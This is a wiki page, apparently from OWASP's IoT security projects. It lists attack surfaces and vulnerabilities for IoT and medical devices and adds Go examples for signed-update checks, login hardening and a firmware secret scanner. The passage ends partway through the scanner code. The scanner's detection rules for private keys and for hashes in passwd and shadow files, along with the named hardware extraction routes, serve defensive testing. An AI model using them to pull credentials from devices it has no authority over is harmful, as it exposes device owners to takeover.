| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physically)<br />
<br />
|-<br />
|}<br />
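The '''Update Mechanism''' and '''Device Firmware''' rows above list unsigned updates, missing update verification, missing update authentication, malicious updates and firmware downgrade as separate attack surface items. The Go program below is an added example, not code from the OWASP IoT Project, showing the device-side checks that close all of them at once: an Ed25519-signed manifest, an anti-rollback version check, and an image hash bound to the manifest. The manifest layout, the provisioned public key, the installed version and the scenario names are assumptions made for this example.<br />
<br />
```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/binary"
	"errors"
	"fmt"
)

// Manifest is the signed metadata a device checks before flashing an image.
// Assumption (not from the OWASP page): the vendor's Ed25519 public key is
// provisioned at manufacture and the device keeps a monotonic installed version.
type Manifest struct {
	Version   uint32
	ImageHash [sha256.Size]byte
	Signature []byte // Ed25519 over encodeManifest(Version, ImageHash)
}

// encodeManifest gives the canonical bytes that are signed and verified.
func encodeManifest(version uint32, hash [sha256.Size]byte) []byte {
	buf := make([]byte, 4+sha256.Size)
	binary.BigEndian.PutUint32(buf, version)
	copy(buf[4:], hash[:])
	return buf
}

// SignManifest runs on the vendor's build system. The private key never
// reaches the device or the update server, so a writable update location or
// a spoofed server cannot produce a manifest the device will accept.
func SignManifest(priv ed25519.PrivateKey, version uint32, image []byte) Manifest {
	h := sha256.Sum256(image)
	return Manifest{Version: version, ImageHash: h,
		Signature: ed25519.Sign(priv, encodeManifest(version, h))}
}

var (
	ErrBadSignature = errors.New("update rejected: manifest signature invalid")
	ErrRollback     = errors.New("update rejected: version not newer than installed")
	ErrHashMismatch = errors.New("update rejected: image hash does not match manifest")
)

// VerifyUpdate is the device-side gate. The signature is checked before any
// manifest field is trusted, the version check blocks re-installing an older
// signed image, and the hash binds the manifest to the bytes actually received.
// Transport encryption (TLS) on its own provides none of these guarantees.
func VerifyUpdate(pub ed25519.PublicKey, installed uint32, m Manifest, image []byte) error {
	if !ed25519.Verify(pub, encodeManifest(m.Version, m.ImageHash), m.Signature) {
		return ErrBadSignature
	}
	if m.Version <= installed {
		return ErrRollback
	}
	h := sha256.Sum256(image)
	if subtle.ConstantTimeCompare(h[:], m.ImageHash[:]) != 1 {
		return ErrHashMismatch
	}
	return nil
}

// RunScenarios runs the verifier over a constructed image and the failure
// modes listed in the table, returning the verdict for each case.
func RunScenarios() map[string]error {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	const installed = 7
	image := []byte("constructed firmware image, version 8")
	good := SignManifest(priv, installed+1, image)

	unsigned := good
	unsigned.Signature = nil // "Updates not signed"

	forged := good
	forged.Version = installed + 2 // manifest edited after signing, without the key

	tampered := append([]byte{}, image...)
	tampered[0] ^= 0xff // image swapped in a writable update location or in transit

	return map[string]error{
		"valid":     VerifyUpdate(pub, installed, good, image),
		"unsigned":  VerifyUpdate(pub, installed, unsigned, image),
		"forged":    VerifyUpdate(pub, installed, forged, image),
		"tampered":  VerifyUpdate(pub, installed, good, tampered),
		"downgrade": VerifyUpdate(pub, installed, SignManifest(priv, installed-1, image), image),
	}
}

func main() {
	for name, verdict := range RunScenarios() {
		fmt.Printf("%-10s -> %v\n", name, verdict)
	}
}
```
<br />
The order of the checks is deliberate: nothing from the manifest is acted on until the signature over it verifies, so a writable update directory or an intercepted download can at most cause a rejected update, never an installed one. An encrypted-only channel would still accept the "forged" and "downgrade" cases.<br />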
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to trivial values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. still offering SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world-writable, potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies availability of that service or of the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software-based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we can obtain full console access to a device<br />
* Security measures usually include a custom bootloader that prevents the attacker from entering single-user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
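The '''Username Enumeration''', '''Weak Passwords''' and '''Account Lockout''' rows above describe three credential weaknesses as separate findings, but the defence for all three lives in the same login path. The Go program below is an added example, not OWASP project code, of a device-local account store that refuses default or trivial passwords at setup, stores only a salted PBKDF2 hash, locks an account after a fixed number of wrong attempts, and returns one error (after the same hashing work) for unknown users, wrong passwords and locked accounts, so neither the message nor the timing reveals which usernames exist. The deny-list, the thresholds and the stdlib-only pbkdf2SHA256 helper are assumptions for this example; a product would use its platform's password KDF.<br />
<br />
```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"crypto/subtle"
	"errors"
	"fmt"
	"strings"
	"time"
)

// Constructed deny-list of factory defaults and trivial strings; a product would ship a far longer one.
var bannedPasswords = map[string]bool{"admin": true, "password": true, "1234": true, "123456": true}

const (
	minPasswordLen = 12
	maxFailures    = 5
	lockoutWindow  = 15 * time.Minute
	pbkdf2Rounds   = 50_000 // demo value; raise for production, or prefer argon2id/bcrypt
)

// pbkdf2SHA256 derives one 32-byte block per RFC 8018 with the standard library only.
func pbkdf2SHA256(password, salt []byte, rounds int) []byte {
	prf := hmac.New(sha256.New, password)
	prf.Write(salt)
	prf.Write([]byte{0, 0, 0, 1}) // INT(1): first (and only) output block
	u := prf.Sum(nil)
	out := append([]byte(nil), u...)
	for i := 1; i < rounds; i++ {
		prf.Reset()
		prf.Write(u)
		u = prf.Sum(nil)
		for j := range out {
			out[j] ^= u[j]
		}
	}
	return out
}

type account struct {
	salt, hash  []byte
	failures    int
	lockedUntil time.Time
}

// Device is the local account store of one IoT device.
type Device struct{ accounts map[string]*account }

var (
	ErrWeakPassword = errors.New("password is a known default or too short")
	ErrLoginFailed  = errors.New("login failed") // the one error for every failure path
)

func NewDevice() *Device { return &Device{accounts: map[string]*account{}} }

// SetPassword enforces the policy at initial setup (no factory default, no
// trivial string, minimum length) and stores only a salted PBKDF2 hash.
func (d *Device) SetPassword(user, password string) error {
	if len(password) < minPasswordLen || bannedPasswords[strings.ToLower(password)] {
		return ErrWeakPassword
	}
	salt := make([]byte, 16)
	if _, err := rand.Read(salt); err != nil {
		return err
	}
	d.accounts[user] = &account{salt: salt, hash: pbkdf2SHA256([]byte(password), salt, pbkdf2Rounds)}
	return nil
}

// Login returns the same error for an unknown user, a wrong password and a locked
// account, and does the same hashing work in every case, so the caller learns nothing.
func (d *Device) Login(user, password string) error {
	now := time.Now()
	acct, known := d.accounts[user]
	if !known {
		acct = &account{salt: make([]byte, 16), hash: make([]byte, 32)} // dummy, never matches
	}
	candidate := pbkdf2SHA256([]byte(password), acct.salt, pbkdf2Rounds)
	if !known || now.Before(acct.lockedUntil) {
		return ErrLoginFailed // unknown, or locked: even a correct password is refused
	}
	if subtle.ConstantTimeCompare(candidate, acct.hash) == 1 {
		acct.failures = 0
		return nil
	}
	acct.failures++
	if acct.failures >= maxFailures {
		acct.failures, acct.lockedUntil = 0, now.Add(lockoutWindow)
	}
	return ErrLoginFailed
}

func main() {
	d := NewDevice()
	fmt.Println(d.SetPassword("admin", "admin"), d.SetPassword("admin", "correct horse battery"))
	for i := 0; i <= maxFailures; i++ {
		fmt.Println(d.Login("admin", "guess")) // sixth call fails because the account is now locked
	}
}
```
<br />
Note that the lock state is never reported to the caller: a distinct "account locked" message would turn the lockout itself into a username oracle, so the device logs the event locally (the Authentication Exceptions category in the IoT Event Logging Project) rather than telling the client.<br />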
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* A way to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
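The "Device Firmware Guidance and Instruction" row lists file system analysis, and the tools row points at firmwalker for searching an extracted file system. The Go program below is an added example, not code from the OWASP project or from firmwalker, of such a scan: it walks an extracted root, reports password hashes (or empty password fields) in /etc/passwd and /etc/shadow, embedded PEM private keys, and key=value secrets in configuration files, and it builds a constructed, deliberately leaky sample tree so it can run offline. The detection rules and the sample files are assumptions for this example, far shorter than a real tool's lists.<br />
<br />
```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"regexp"
	"strings"
)

// Finding is one suspicious item located in the extracted filesystem.
type Finding struct{ Path, Rule, Detail string }

var (
	// Constructed rules, far shorter than firmwalker's; "=" only, so nsswitch-style "passwd: files" is skipped.
	privateKeyRe = regexp.MustCompile(`-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----`)
	credentialRe = regexp.MustCompile(`(?i)(?:pass(?:word|wd)?|secret|api[_-]?key)\s*=\s*["']?[^\s"']+`)
	accountFiles = map[string]bool{"etc/passwd": true, "etc/shadow": true}
)

// accountSecret: a hash in field 2 of passwd/shadow is a baked-in password; an empty field 2 needs no password at all.
func accountSecret(line string) (user, detail string, ok bool) {
	fields := strings.Split(line, ":")
	if len(fields) < 2 {
		return "", "", false
	}
	switch fields[1] {
	case "":
		return fields[0], "empty password field (no password required)", true
	case "x", "*", "!", "!!":
		return "", "", false // shadowed or locked: nothing to report
	}
	return fields[0], "password hash present", true
}

// ScanRootFS walks an extracted firmware root and reports baked-in account credentials, private keys and config secrets.
func ScanRootFS(root string) (findings []Finding, err error) {
	err = filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil || d.IsDir() {
			return err
		}
		rel := filepath.ToSlash(strings.TrimPrefix(path, root+string(filepath.Separator)))
		data, err := os.ReadFile(path)
		if err != nil {
			return err
		}
		for i, line := range strings.Split(string(data), "\n") {
			switch {
			case accountFiles[rel]:
				if user, detail, ok := accountSecret(line); ok {
					findings = append(findings, Finding{rel, "account-credential", fmt.Sprintf("line %d, user %q: %s", i+1, user, detail)})
				}
			case privateKeyRe.MatchString(line):
				findings = append(findings, Finding{rel, "private-key", fmt.Sprintf("line %d: PEM private key block", i+1)})
			case credentialRe.MatchString(line):
				findings = append(findings, Finding{rel, "hardcoded-credential", fmt.Sprintf("line %d: %s", i+1, strings.TrimSpace(line))})
			}
		}
		return nil
	})
	return findings, err
}

// BuildSampleRootFS writes a constructed, deliberately leaky extracted filesystem into dir so the scan can run offline.
func BuildSampleRootFS(dir string) error {
	files := map[string]string{
		"etc/passwd":      "root:x:0:0:root:/root:/bin/sh\nadmin:$1$c0nstr$uctedHashValue:0:0::/:/bin/sh\n",
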